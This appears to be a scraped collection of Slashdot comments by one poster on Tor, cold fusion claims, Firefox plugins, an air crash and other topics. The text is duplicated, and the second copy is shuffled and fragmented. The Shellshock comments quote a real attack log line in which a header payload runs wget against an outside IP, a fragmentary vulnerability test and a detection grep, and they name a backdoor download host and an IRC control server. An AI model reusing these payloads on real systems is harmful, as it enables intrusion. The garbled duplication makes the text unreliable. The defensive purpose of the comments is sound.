Given the speed at impact: ~800 km/h - ~500 mph, the odds of anyone surviving the actual crash are probably extremely remote. The largest body parts they found were apparently "the size of a brief case" - and the size of the largest debris that of "a small car" (whatever that means).
The weird thing is, apparently the procedure when one of the pilots leaves the cockpit is for one of the flights attendants to go inside the cockpit temporarily until he returns, I imagine specifically to try and prevent such a scenario. If that's true, they probably simply didn't apply protocol, especially for such a short routine flight. Hopefully this event will make sure it will be applied in the future (still, can't wait for planes to be entirely remote or AI controlled to avoid this kind of things).
Maybe the pilot was extremely depressed (and incredibly selfish - although depression may have been so strong he didn't even care anymore), and decided he couldn't take it anymore. Or maybe he played kerbal and decided to try some good old lithobraking:-p (too soon ?)
It's a Python frontend to the wireshark filters accessible from a GUI console. Whoop dee doo !
That being said, it also includes some features for tracking continuous sessions based on L7 filtering, provides a limited GeoIP resolution, and so on - and it at least provides a framework for developing more advanced analysis.
As others have said since this release, it is at least an open source, base framework for developing more advanced stuff, and it provides library integration points for other software. As basic as it is, it might provide a common framework for an open development of an advanced traffic analysis tool that'll be open (after careful reading of the code, any relatively good expert would be able to provide a similarly capable code in a matter of days and probably has, as an interesting case study/exercise previously - I know I did, limited to HTTP analysis but still). That can only be a good thing, if only to regroup efforts in that direction to provide a universal traffic analysis tool for forensics and so on.
Any code being released open source is always a plus:-) It's nice to see even the US army realizes this.
Indeed. This network of organizations does exactly that - providing exit nodes with the money and the lawyers to fight the bullshit. Hopefully the fact that Mozilla is joining the party means others might follow.
Reading my post again, I should add: tor (very) likely works, as long as it is used for accessing hidden services, staying inside the tor network. As a bridge to access the general Internet, given the wide scope of monitoring by the NSA and co (shit, given the Snowden docs they seem to be able to view almost the entire network), there are several signs that timing analysis could semi-reliably de-anonymize specific users for a limited time.
how does the DoJ know what percentage of ANYTHING is going through it
That's an easy one: they make that number up, to spread FUD about it. And read the article I linked, BTW (and the source it links): the number in question has been easily disproved, with a relatively simple analysis of hidden services' hostnames resolution. Tor is not the USA's tool - it is an open source, publicly available software that was originally financed by part of the US government, period.
I realize all the Snowden revelations have made lots of people a bit paranoid (which is a good thing, mostly); but the fact is, it is extremely unlikely that tor is compromised in any serious way. Barring human error, tor works, mostly - there are some attacks possible, and there are demonstrated attempts by the NSA and others to compromise it (with some extremely limited results, both in their scope and in their duration); however, I have not seen any shred of evidence suggesting that it has been compromised in any serious way. This growing meme that "tor is broken for good", and the larger one that "if it's connected to a network, it's accessible by the NSA" is simply bullshit.
The thing is, in all likelihood, tor works. GPG works. If you encrypt something with GPG and the key is not available to them, even the most powerful security agency on the planet will not be able to read it. The advances both in basic mathematics and/or computing required to break those are so extreme that it would be very, very hard to hide it. And nothing in the Snowden leaks has suggested that those have been broken - quite the contrary, in fact, since several of the revealed documents suggest that tor and the growing encryption usage are a serious problem to those agencies.
That doesn't mean that it'll stay that way, mind; personally, I think that some sort of quantum computing might be in reach of those same agencies in a few years (and they are dumping and storing all the encrypted, non-breakable traffic they can in the meantime, I imagine waiting for this day) - and even that personal opinion will seem paranoid and far fetched to most experts in the field. But in the meantime, the most likely hypothesis is simply that those encryption algorithms and protocols are still secure. If you have any shred of evidence that is not the case, please link those - I'd genuinely appreciate it.
And finally, about Ulbricht and the other dark net markets taken down more recently: all of those have been clearly linked to human error, from corroborating testimonies from several parties. So sure, you can believe that this is entirely parallel construction, and you can also believe that Obama and most of the five eyes countries are bitching about encryption more and more to present a plausible deniability front while decrypting everything in the background; but right now, once again, there's nothing public even hinting at that.
It should be noted that those are relays, which transit data inside the tor network, not exit nodes (which provide exit points to the general network and can be a large risk for their operator should any illegal content be accessed). Relays still help with the general obfuscation of the network as well as for hidden services, though.
Apparently, Mozilla is considering eventually deploying exit nodes as well though.
Finally, for those that will scream "child porn", it should be noted that a very, very small minority of tor traffic is actually linked to that type of content, despite what the DoJ says; the best estimates from the tor project is around 1.5%. This move by Mozilla is a good thing - amongst other things helping countless defenders of freedom in oppressed regimes speak up in safety.
I guess it could - firefox's plugin-container is compiled for the same arch as the browser itself though (so if you install firefox 32 bits, you'll get the 32 bits plugin-container).
A quick search seems to suggest it would be theoretically possible to have an 64 bits firefox talking to a 32 bits plugin-container loading, say, the flash plugin; it appears however that that would require an IPC bridge between both process to perform some sort of conversion (this suggests that somehow the way both process communicate is arch dependent ? I don't know enough about xulrunner to confirm).
There's a compatibility layer that apparently exists to do exactly that: nspluginwrapper.
Myself, I tend to avoid the headache and simply run the 32 bits version of Firefox even on an amd64 system.
I suspect he was talking about firefox plugins (flash, java, the google hangouts one, etc.), not add-ons. The plugins are indeed dynamically loaded libraries that need to be compiled for the same architecture as the browser itself in order to be loaded.
No. The entire experiment was setup by the researchers themselves; the lab has no connection to Rossi, and none of the equipment came or was set-up by him. His only implication was to be here for the initial "fuel" insertion and the ash retrieval at the end, while being monitored (though that's more than enough to be suspicious of the alleged transmutation and suspect some sort of swap - still, it doesn't explain the excess energy).
Oh, he says words which he calls an explanation, but they fly in the face of already-understood theory, and he offers no explanations about why already-understood theory is wrong.
Agreed on this - it should be noted, though, that Rossi is not the only one that claims excess energy and transmutation using these kinds of mechanisms; look up for example the MIT NANOR devide (a small scale device that put out excess energy for more than one month straight), or the Mitsubishi transmutation claims in similar devices (later replicated by Toshiba). There are also other companies claiming similar things (Brillouin for one).
If this thing works (and that's obviously a big if), then I'd suspect Rossi discovered this mostly by accident, and that he has no precise idea himself of how it actually produces energy. IIRC, the few initial theories proposed are based on the idea of nano-scale lattices with trapped hydrogen inside; combined with some sort of excitation (EM usually, although not the only one that apparently produced some results) allowing somehow for the Coulomb barrier to be overcome at those scales and for a limited-scale, radiation-less (how ?) fusion to occur.
This is of course all pretty impossible given our current understanding of physics so if it does work somehow, it's wonderful news, even if it cannot be harnessed for energy; because it might lead to new, exciting physics.
I don't see that anybody checked the "reactor" coating materials for rare earth dopants.
Read the report (specifically page 8 and annex 2) - they actually analyzed the device's coating material. It was made of Al2O3 (and this was taken into account in the calorimetry), with no obvious other compounds.
While there are possible calorimetry issues here, it's hard to see an obvious one that would explain such a large measurement error; alumina IR transparency has been considered, as well as IR calibration issues (especially given the imperfect dummy test); both do not appear to be valid critics (see my comment here for details).
Given the extraordinary claims, extraordinary evidence is obviously required here; and this report definitely isn't that. Its experimental protocol and the results obtained are however more than enough to warrant further investigation; which may be hard given that this isn't like a "classical" experiment, that can be easily replicated - you basically need Rossi/Industrial Heat (the company that acquired Rossi's device and tech) to provide you with his black box and stay the hell away from the test (this is the first time he actually did that; and even here he couldn't help himself being present for the initial "fuel" insertion and the ash extraction at the end of the experiment - which render the isotopic changes inevitably suspicious).
Nope, that was true in the first test, not this one. None of the instruments came or were set up by Rossi. This test didn't occur in his lab, but in a neutral lab with controlled access. He was however present for the loading of the initial "fuel" and the extraction of the ash at the end of the test (which was stupid, and suspicious - especially given the witnessed isotopic changes in the ash).
Even assuming he did some swap on the ash itself, though, it does not explain the witnessed extra heat output (which even with extremely conservative estimates in the paper sets a CoP at ~3.6).
Now, their calorimetry is far from perfect - there were initial concerns about alumina (the device's main material) transparency to IR, for example; those have been put to rest given the fact that the IR camera used works above 7um wavelengths and at those ranges, transparency isn't an issue. Another concern (stressed by other people above) is the whole way the IR camera itself was calibrated and set-up - however, the IR cam was a new, never before used one, and they simply tested its calibration. Even if the measures are off due to the bad calorimetry, there is no obvious way it could translate into an error of that magnitude without some other obvious signs of it (like crazy differences between the hotter "segments" of the device and others, colder ones). And once again, they made all of their calculation using very conservative estimates and taking into account all margins of error.
As for the researchers themselves, they are far from disreputable (except maybe for Levi in this specific context); they are engaging their reputation by publishing this and one of them, Hanno Essen, is also the head of the Swedish Skeptics Society and has at least some experience in dealing with crackpots and suspicious "revolutionary" inventions.
This does warrant further research; beyond ad hominem attacks on Rossi, I haven't seen any strong critic of the experimental protocol that hasn't been quickly debunked (except for the transmutation thing; that could be explained by Rossi doing some sort of swap. It should be noted that he was watched at all time by several people though).
It's not the only botnet being constructed, see my comment here - already 653 exploited servers there right now.
This is quite bad - as long as a bash CGI script is found by probing, exploiting only require putting a bash command in a header such as "Cookie:" for it to be executed. And this is only through HTTP - there are also aready other proof of concepts exploiting this through other bash-using services (DHCP servers for example).
You can check if you've been scanned for exploitable CGIs using something like (adjust apache logs path accordingly):
grep cgi/var/log/apache2/access*|egrep "};|}\s*;"
And you can check if your bash is vulnerable using:
Another one attempts to download and execute h t t p://213.5.67.223/jurat , a perl backdoor that'll connect to a control IRC server (46.16.170.158 port 443), presumably so that a botnet can be constructed. It allows for port scanning and DDOSing remote targets based on IRC commands received.
And right now, there are already 560 invisible users connected there... and it grows at quite a pace. The flaw is definitely being exploited in the wild.
The only thing that link proves is that WPA2-PSK is secure as long as you choose a long enough password.
Of course you can capture a handshake and try and bruteforce the password. But as long as said password is long enough, and even with GPU-assisted cracking, you'll die before you even go through a thousandth of the possibility space.
Security doesn't have to be perfect - if it turns out eventually that hardware advances or a flaw in the implementation makes an attack even remotely feasible, then you'll surely be able to update the heart's firmware or even, worst case scenario, to replace it. For the time being, it's good enough. And even if an attack is possible (jamming seems certainly possible, for example, and would prevent adjusting the heart rate for the duration), the device should never obey any command that may put the user at risk - IE, never go below a certain rate.
Meanwhile, the people this device is implanted in wouldn't even be alive without it. And shit, we're talking about a completely artificial heart, currently being implanted in humans, the first one of which allowed its wearer to last for 76 days (an impressive success by all accounts). This is the stuff of science fiction. The WIFI aspect hardly seems relevant compared to this - and yet 90% of the comments seem to focus on that. How depressing.
The Minecraft modders are using some of the Minecraft code (as a result of decompilation and related techniques).
If the source code in question has been obtained by decompilation, is it really the "original" Minecraft source code (the one that is covered by the original license) ? I mean, you're basically looking at a non human-readable binary, freely distributed, and deducing a source code that would produce the same binary. At this point the resulting source code is your work IMHO.
Then again, things may seem a little different here since it's Java and I think using "decompilation" on the byte code produces code that is likely to be extremely close to the original. But it doesn't really seem that different.
At any rate, this specific case seems a lot more straightforward since if I understand correctly the bukkit guys sold their project without getting permission from all their contributors - the fact that the bukkit people used decompiled Java bytecode appears to have little relevance to the case itself.
They didn't - they were 'simple' water collectors (such as, I think, already exist), providing a small amount of clean water at dawn but not generating any energy in the process.
This tech, however, would be a nice one to power the Fremen's stillsuits in the same universe - providing additional water from the atmosphere while at the same time powering the various pumps and recycling tech inside of the suit:-) though if I remember correctly Herbert described those as powered by the movements of the user.
It's only a diff of the new fishy 7.2 changes. You can grab the source on the archlinux FTP though.
Presumably the guys in charge of the public crowd-funded audit could also provide a version of the source that would be deemed "trusted" by most people (and those that have already downloaded the source previously can offer confirmation).
Leaving out the value part is where the system broke down.
What's the value all of the US's cities ? all the buildings, the infrastructure, the work of arts, the land itself (and its capacity to provide food, minerals and resources in general) ? for that matter, what's the value of the people in the US - builders, farmers, doctors, scientists ?
This is what the currency is backed by: the value of the country itself. The US government represent all the people in the US and all those valuable things - land, buildings, etc.... It emits currency and pays with it; that says to the people accepting the currency: yes, we represent all those valuable things, and worst case scenario if we cannot pay you back then we have collaterals - you can take a bit of land instead, or our scientists will work on your project for N years, etc... and it will sure help you more than some gold.
It's not perfect but it sure seems to me that it makes more sense than backing the currency with big lumps of yellow metal with relatively limited uses.
I'm very okay with this kind of "freedom" proceeding slowly, even taking a couple steps backwards once in a while, because the advancements that it does bring are completely worth it when compared to not-100%-perfect ethical mores.
I'm not - why should we settle for small steps, when we already have the capability to make giant ones ? where would we be right now as a species if even half the money spent in DRM schemes/IP protection stuff had been thrown in global network deployment (there are still large parts of the planet's population with no access to the Internet, or even no electricity) and putting online courses/teaching material/culture online ?
Technology advances the fastest when people with LOTS of money have their way
While the rest of your post seems pretty reasonable and possibly less utopic/optimistic than mine, this I strongly doubt. It seems to me that the very resources inequalities we're seeing currently - the very fact that some people posess thousands times more money/power than most - is a major part of such an artificially enforced scarcity. It's just concentration of power, and people in power wanting to keep that power.
Maybe I'm just too young / not cynical (call it realistic if you will) enough; that being said, once again, having the capability to diffuse culture massively and willingly limiting that capability seems like a form of madness to me. Makes you wonder what'll happen when material, real-life scarcity will no longer be an issue (and I personally think we're not that far of).
Slashdot Mirror
Commenting to undo wrong moderation.
Given the speed at impact: ~800 km/h - ~500 mph, the odds of anyone surviving the actual crash are probably extremely remote. The largest body parts they found were apparently "the size of a brief case" - and the size of the largest debris that of "a small car" (whatever that means).
:-p (too soon ?)
The weird thing is, apparently the procedure when one of the pilots leaves the cockpit is for one of the flights attendants to go inside the cockpit temporarily until he returns, I imagine specifically to try and prevent such a scenario. If that's true, they probably simply didn't apply protocol, especially for such a short routine flight. Hopefully this event will make sure it will be applied in the future (still, can't wait for planes to be entirely remote or AI controlled to avoid this kind of things).
Maybe the pilot was extremely depressed (and incredibly selfish - although depression may have been so strong he didn't even care anymore), and decided he couldn't take it anymore. Or maybe he played kerbal and decided to try some good old lithobraking
It's a Python frontend to the wireshark filters accessible from a GUI console. Whoop dee doo !
:-) It's nice to see even the US army realizes this.
That being said, it also includes some features for tracking continuous sessions based on L7 filtering, provides a limited GeoIP resolution, and so on - and it at least provides a framework for developing more advanced analysis.
As others have said since this release, it is at least an open source, base framework for developing more advanced stuff, and it provides library integration points for other software. As basic as it is, it might provide a common framework for an open development of an advanced traffic analysis tool that'll be open (after careful reading of the code, any relatively good expert would be able to provide a similarly capable code in a matter of days and probably has, as an interesting case study/exercise previously - I know I did, limited to HTTP analysis but still). That can only be a good thing, if only to regroup efforts in that direction to provide a universal traffic analysis tool for forensics and so on.
Any code being released open source is always a plus
Indeed. This network of organizations does exactly that - providing exit nodes with the money and the lawyers to fight the bullshit. Hopefully the fact that Mozilla is joining the party means others might follow.
Reading my post again, I should add: tor (very) likely works, as long as it is used for accessing hidden services, staying inside the tor network. As a bridge to access the general Internet, given the wide scope of monitoring by the NSA and co (shit, given the Snowden docs they seem to be able to view almost the entire network), there are several signs that timing analysis could semi-reliably de-anonymize specific users for a limited time.
how does the DoJ know what percentage of ANYTHING is going through it
That's an easy one: they make that number up, to spread FUD about it. And read the article I linked, BTW (and the source it links): the number in question has been easily disproved, with a relatively simple analysis of hidden services' hostnames resolution. Tor is not the USA's tool - it is an open source, publicly available software that was originally financed by part of the US government, period.
I realize all the Snowden revelations have made lots of people a bit paranoid (which is a good thing, mostly); but the fact is, it is extremely unlikely that tor is compromised in any serious way. Barring human error, tor works, mostly - there are some attacks possible, and there are demonstrated attempts by the NSA and others to compromise it (with some extremely limited results, both in their scope and in their duration); however, I have not seen any shred of evidence suggesting that it has been compromised in any serious way. This growing meme that "tor is broken for good", and the larger one that "if it's connected to a network, it's accessible by the NSA" is simply bullshit.
The thing is, in all likelihood, tor works. GPG works. If you encrypt something with GPG and the key is not available to them, even the most powerful security agency on the planet will not be able to read it. The advances both in basic mathematics and/or computing required to break those are so extreme that it would be very, very hard to hide it. And nothing in the Snowden leaks has suggested that those have been broken - quite the contrary, in fact, since several of the revealed documents suggest that tor and the growing encryption usage are a serious problem to those agencies.
That doesn't mean that it'll stay that way, mind; personally, I think that some sort of quantum computing might be in reach of those same agencies in a few years (and they are dumping and storing all the encrypted, non-breakable traffic they can in the meantime, I imagine waiting for this day) - and even that personal opinion will seem paranoid and far fetched to most experts in the field. But in the meantime, the most likely hypothesis is simply that those encryption algorithms and protocols are still secure. If you have any shred of evidence that is not the case, please link those - I'd genuinely appreciate it.
And finally, about Ulbricht and the other dark net markets taken down more recently: all of those have been clearly linked to human error, from corroborating testimonies from several parties. So sure, you can believe that this is entirely parallel construction, and you can also believe that Obama and most of the five eyes countries are bitching about encryption more and more to present a plausible deniability front while decrypting everything in the background; but right now, once again, there's nothing public even hinting at that.
It should be noted that those are relays, which transit data inside the tor network, not exit nodes (which provide exit points to the general network and can be a large risk for their operator should any illegal content be accessed). Relays still help with the general obfuscation of the network as well as for hidden services, though.
Apparently, Mozilla is considering eventually deploying exit nodes as well though.
Finally, for those that will scream "child porn", it should be noted that a very, very small minority of tor traffic is actually linked to that type of content, despite what the DoJ says; the best estimates from the tor project is around 1.5%. This move by Mozilla is a good thing - amongst other things helping countless defenders of freedom in oppressed regimes speak up in safety.
I guess it could - firefox's plugin-container is compiled for the same arch as the browser itself though (so if you install firefox 32 bits, you'll get the 32 bits plugin-container).
A quick search seems to suggest it would be theoretically possible to have an 64 bits firefox talking to a 32 bits plugin-container loading, say, the flash plugin; it appears however that that would require an IPC bridge between both process to perform some sort of conversion (this suggests that somehow the way both process communicate is arch dependent ? I don't know enough about xulrunner to confirm).
There's a compatibility layer that apparently exists to do exactly that: nspluginwrapper.
Myself, I tend to avoid the headache and simply run the 32 bits version of Firefox even on an amd64 system.
I suspect he was talking about firefox plugins (flash, java, the google hangouts one, etc.), not add-ons. The plugins are indeed dynamically loaded libraries that need to be compiled for the same architecture as the browser itself in order to be loaded.
later replicated by Toshiba
It's actually Toyota (and makes a lot more sense) - my bad.
But the "inventor" hooked up the meter, no?
No. The entire experiment was setup by the researchers themselves; the lab has no connection to Rossi, and none of the equipment came or was set-up by him. His only implication was to be here for the initial "fuel" insertion and the ash retrieval at the end, while being monitored (though that's more than enough to be suspicious of the alleged transmutation and suspect some sort of swap - still, it doesn't explain the excess energy).
Oh, he says words which he calls an explanation, but they fly in the face of already-understood theory, and he offers no explanations about why already-understood theory is wrong.
Agreed on this - it should be noted, though, that Rossi is not the only one that claims excess energy and transmutation using these kinds of mechanisms; look up for example the MIT NANOR devide (a small scale device that put out excess energy for more than one month straight), or the Mitsubishi transmutation claims in similar devices (later replicated by Toshiba). There are also other companies claiming similar things (Brillouin for one).
If this thing works (and that's obviously a big if), then I'd suspect Rossi discovered this mostly by accident, and that he has no precise idea himself of how it actually produces energy. IIRC, the few initial theories proposed are based on the idea of nano-scale lattices with trapped hydrogen inside; combined with some sort of excitation (EM usually, although not the only one that apparently produced some results) allowing somehow for the Coulomb barrier to be overcome at those scales and for a limited-scale, radiation-less (how ?) fusion to occur.
This is of course all pretty impossible given our current understanding of physics so if it does work somehow, it's wonderful news, even if it cannot be harnessed for energy; because it might lead to new, exciting physics.
I don't see that anybody checked the "reactor" coating materials for rare earth dopants.
Read the report (specifically page 8 and annex 2) - they actually analyzed the device's coating material. It was made of Al2O3 (and this was taken into account in the calorimetry), with no obvious other compounds.
While there are possible calorimetry issues here, it's hard to see an obvious one that would explain such a large measurement error; alumina IR transparency has been considered, as well as IR calibration issues (especially given the imperfect dummy test); both do not appear to be valid critics (see my comment here for details).
Given the extraordinary claims, extraordinary evidence is obviously required here; and this report definitely isn't that. Its experimental protocol and the results obtained are however more than enough to warrant further investigation; which may be hard given that this isn't like a "classical" experiment, that can be easily replicated - you basically need Rossi/Industrial Heat (the company that acquired Rossi's device and tech) to provide you with his black box and stay the hell away from the test (this is the first time he actually did that; and even here he couldn't help himself being present for the initial "fuel" insertion and the ash extraction at the end of the experiment - which render the isotopic changes inevitably suspicious).
They looked at the instruments set up by Rossi
Nope, that was true in the first test, not this one. None of the instruments came or were set up by Rossi. This test didn't occur in his lab, but in a neutral lab with controlled access. He was however present for the loading of the initial "fuel" and the extraction of the ash at the end of the test (which was stupid, and suspicious - especially given the witnessed isotopic changes in the ash).
Even assuming he did some swap on the ash itself, though, it does not explain the witnessed extra heat output (which even with extremely conservative estimates in the paper sets a CoP at ~3.6).
Now, their calorimetry is far from perfect - there were initial concerns about alumina (the device's main material) transparency to IR, for example; those have been put to rest given the fact that the IR camera used works above 7um wavelengths and at those ranges, transparency isn't an issue. Another concern (stressed by other people above) is the whole way the IR camera itself was calibrated and set-up - however, the IR cam was a new, never before used one, and they simply tested its calibration. Even if the measures are off due to the bad calorimetry, there is no obvious way it could translate into an error of that magnitude without some other obvious signs of it (like crazy differences between the hotter "segments" of the device and others, colder ones). And once again, they made all of their calculation using very conservative estimates and taking into account all margins of error.
As for the researchers themselves, they are far from disreputable (except maybe for Levi in this specific context); they are engaging their reputation by publishing this and one of them, Hanno Essen, is also the head of the Swedish Skeptics Society and has at least some experience in dealing with crackpots and suspicious "revolutionary" inventions.
This does warrant further research; beyond ad hominem attacks on Rossi, I haven't seen any strong critic of the experimental protocol that hasn't been quickly debunked (except for the transmutation thing; that could be explained by Rossi doing some sort of swap. It should be noted that he was watched at all time by several people though).
My bad - indeed it is.
Would there be any way for that probe to execute against a static 404 page - no cgi executing?
No - there actually need to be a bash CGI script for it to work; as long as you have only 404 codes you are fine.
It's not the only botnet being constructed, see my comment here - already 653 exploited servers there right now.
/var/log/apache2/access*|egrep "};|}\s*;"
:;}; echo vulnerable' bash -c 'echo Testing...'
This is quite bad - as long as a bash CGI script is found by probing, exploiting only require putting a bash command in a header such as "Cookie:" for it to be executed. And this is only through HTTP - there are also aready other proof of concepts exploiting this through other bash-using services (DHCP servers for example).
You can check if you've been scanned for exploitable CGIs using something like (adjust apache logs path accordingly):
grep cgi
And you can check if your bash is vulnerable using:
env x='() {
If 'vulnerable' appears, it is.
Another one attempts to download and execute h t t p ://213.5.67.223/jurat , a perl backdoor that'll connect to a control IRC server (46.16.170.158 port 443), presumably so that a botnet can be constructed. It allows for port scanning and DDOSing remote targets based on IRC commands received.
And right now, there are already 560 invisible users connected there... and it grows at quite a pace. The flaw is definitely being exploited in the wild.
Just saw this in the server logs on one of our servers:
/cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 392 "-" "() { :; }; /usr/bin/wget 82.165.144.187/bbbbbbbbbbbb"
// 82.165.144.187/bbbbbbbbbbbb to confirm the system is vulnerable).
82.165.144.187 - - [25/Sep/2014:18:55:59 +0200] "GET
An attempt at exploiting the vulnerability (trying to wget h t t p :
The only thing that link proves is that WPA2-PSK is secure as long as you choose a long enough password.
Of course you can capture a handshake and try and bruteforce the password. But as long as said password is long enough, and even with GPU-assisted cracking, you'll die before you even go through a thousandth of the possibility space.
Security doesn't have to be perfect - if it turns out eventually that hardware advances or a flaw in the implementation makes an attack even remotely feasible, then you'll surely be able to update the heart's firmware or even, worst case scenario, to replace it. For the time being, it's good enough. And even if an attack is possible (jamming seems certainly possible, for example, and would prevent adjusting the heart rate for the duration), the device should never obey any command that may put the user at risk - IE, never go below a certain rate.
Meanwhile, the people this device is implanted in wouldn't even be alive without it. And shit, we're talking about a completely artificial heart, currently being implanted in humans, the first one of which allowed its wearer to last for 76 days (an impressive success by all accounts). This is the stuff of science fiction. The WIFI aspect hardly seems relevant compared to this - and yet 90% of the comments seem to focus on that. How depressing.
The Minecraft modders are using some of the Minecraft code (as a result of decompilation and related techniques).
If the source code in question has been obtained by decompilation, is it really the "original" Minecraft source code (the one that is covered by the original license) ? I mean, you're basically looking at a non human-readable binary, freely distributed, and deducing a source code that would produce the same binary. At this point the resulting source code is your work IMHO.
Then again, things may seem a little different here since it's Java and I think using "decompilation" on the byte code produces code that is likely to be extremely close to the original. But it doesn't really seem that different.
At any rate, this specific case seems a lot more straightforward since if I understand correctly the bukkit guys sold their project without getting permission from all their contributors - the fact that the bukkit people used decompiled Java bytecode appears to have little relevance to the case itself.
They didn't - they were 'simple' water collectors (such as, I think, already exist), providing a small amount of clean water at dawn but not generating any energy in the process. :-) though if I remember correctly Herbert described those as powered by the movements of the user.
This tech, however, would be a nice one to power the Fremen's stillsuits in the same universe - providing additional water from the atmosphere while at the same time powering the various pumps and recycling tech inside of the suit
It's only a diff of the new fishy 7.2 changes. You can grab the source on the archlinux FTP though.
Presumably the guys in charge of the public crowd-funded audit could also provide a version of the source that would be deemed "trusted" by most people (and those that have already downloaded the source previously can offer confirmation).
Leaving out the value part is where the system broke down.
What's the value all of the US's cities ? all the buildings, the infrastructure, the work of arts, the land itself (and its capacity to provide food, minerals and resources in general) ? for that matter, what's the value of the people in the US - builders, farmers, doctors, scientists ?
This is what the currency is backed by: the value of the country itself. The US government represent all the people in the US and all those valuable things - land, buildings, etc.... It emits currency and pays with it; that says to the people accepting the currency: yes, we represent all those valuable things, and worst case scenario if we cannot pay you back then we have collaterals - you can take a bit of land instead, or our scientists will work on your project for N years, etc... and it will sure help you more than some gold.
It's not perfect but it sure seems to me that it makes more sense than backing the currency with big lumps of yellow metal with relatively limited uses.
I'm very okay with this kind of "freedom" proceeding slowly, even taking a couple steps backwards once in a while, because the advancements that it does bring are completely worth it when compared to not-100%-perfect ethical mores.
I'm not - why should we settle for small steps, when we already have the capability to make giant ones ? where would we be right now as a species if even half the money spent in DRM schemes/IP protection stuff had been thrown in global network deployment (there are still large parts of the planet's population with no access to the Internet, or even no electricity) and putting online courses/teaching material/culture online ?
Technology advances the fastest when people with LOTS of money have their way
While the rest of your post seems pretty reasonable and possibly less utopic/optimistic than mine, this I strongly doubt. It seems to me that the very resources inequalities we're seeing currently - the very fact that some people posess thousands times more money/power than most - is a major part of such an artificially enforced scarcity. It's just concentration of power, and people in power wanting to keep that power.
Maybe I'm just too young / not cynical (call it realistic if you will) enough; that being said, once again, having the capability to diffuse culture massively and willingly limiting that capability seems like a form of madness to me. Makes you wonder what'll happen when material, real-life scarcity will no longer be an issue (and I personally think we're not that far of).